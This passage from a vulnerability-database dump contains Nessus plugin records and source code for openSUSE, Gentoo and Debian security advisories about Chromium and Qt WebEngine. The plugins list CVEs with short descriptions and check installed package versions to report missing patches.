CVE-2021-21172: Insufficient policy enforcement in File\n System API.\n\n - CVE-2021-21173: Side-channel information leakage in\n Network Internals.\n\n - CVE-2021-21174: Inappropriate implementation in\n Referrer.\n\n - CVE-2021-21175: Inappropriate implementation in Site\n isolation.\n\n - CVE-2021-21176: Inappropriate implementation in full\n screen mode.\n\n - CVE-2021-21177: Insufficient policy enforcement in\n Autofill.\n\n - CVE-2021-21178: Inappropriate implementation in\n Compositing.\n\n - CVE-2021-21179: Use after free in Network Internals.\n\n - CVE-2021-21180: Use after free in tab search.\n\n - CVE-2020-27844: Heap buffer overflow in OpenJPEG.\n\n - CVE-2021-21181: Side-channel information leakage in\n autofill.\n\n - CVE-2021-21182: Insufficient policy enforcement in\n navigations.\n\n - CVE-2021-21183: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21184: Inappropriate implementation in\n performance APIs.\n\n - CVE-2021-21185: Insufficient policy enforcement in\n extensions.\n\n - CVE-2021-21186: Insufficient policy enforcement in QR\n scanning.\n\n - CVE-2021-21187: Insufficient data validation in URL\n formatting.\n\n - CVE-2021-21188: Use after free in Blink.\n\n - CVE-2021-21189: Insufficient policy enforcement in\n payments.\n\n - CVE-2021-21190: Uninitialized Use in PDFium.\n\n - CVE-2021-21149: Stack overflow in Data Transfer.\n\n - CVE-2021-21150: Use after free in Downloads.\n\n - CVE-2021-21151: Use after free in Payments.\n\n - CVE-2021-21152: Heap buffer overflow in Media.\n\n - CVE-2021-21153: Stack overflow in GPU Process. \n\n - CVE-2021-21154: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21155: Heap buffer overflow in Tab Strip.\n\n - CVE-2021-21156: Heap buffer overflow in V8.\n\n - CVE-2021-21157: Use after free in Web Sockets. 
\n\n - Fixed Sandbox with glibc 2.33 (boo#1182233)\n\n - Fixed an issue where chromium hangs on opening\n (boo#1182775).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1182775\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27844\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromedriver-debuginfo-89.0.4389.72-lp152.2.77.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"chromium-debuginfo-89.0.4389.72-lp152.2.77.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-10-17T06:46:04", "description": "The remote host is affected by the vulnerability described in 
GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 3, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-02T00:00:00", "title": "GLSA-202004-04 : Qt WebEngine: Arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720"], "modified": "2020-04-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:qtwebengine"], "id": "GENTOO_GLSA-202004-04.NASL", "href": "https://www.tenable.com/plugins/nessus/135115", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202004-04.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135115);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2019-13720\");\n script_xref(name:\"GLSA\", value:\"202004-04\");\n\n script_name(english:\"GLSA-202004-04 : Qt WebEngine: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202004-04\n(Qt WebEngine: Arbitrary code execution)\n\n A use-after-free vulnerability has been found in the audio component of\n Qt WebEngine.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file in an application linked against Qt WebEngine, possibly resulting in\n execution of arbitrary code with the privileges of the process or a\n Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202004-04\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Qt WebEngine users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-qt/qtwebengine-5.14.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-qt/qtwebengine\", unaffected:make_list(\"ge 5.14.1\"), vulnerable:make_list(\"lt 5.14.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Qt WebEngine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T07:11:36", "description": "Several vulnerabilites have 
been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a 
use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a 
use-after-free issue in the\n Aura window and event manager.", "edition": 4, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-04-07T00:00:00", "title": "Debian DSA-4886-1 : chromium - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21192", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21196", "CVE-2021-21195", "CVE-2021-21171", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21199", "CVE-2021-21172", "CVE-2021-21191", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21193", "CVE-2021-21166", "CVE-2021-21194", "CVE-2021-21175", "CVE-2021-21198", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169", "CVE-2021-21197"], "modified": "2021-04-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:chromium"], "id": "DEBIAN_DSA-4886.NASL", "href": "https://www.tenable.com/plugins/nessus/148364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4886. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148364);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/15\");\n\n script_cve_id(\"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\");\n script_xref(name:\"DSA\", value:\"4886\");\n script_xref(name:\"IAVA\", value:\"2021-A-0152\");\n\n script_name(english:\"Debian DSA-4886-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilites have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - 
CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n 
James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a use-after-free issue in the\n Aura window and event manager.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2021-21161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21177\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21186\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21193\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4886\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 89.0.4389.114-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", 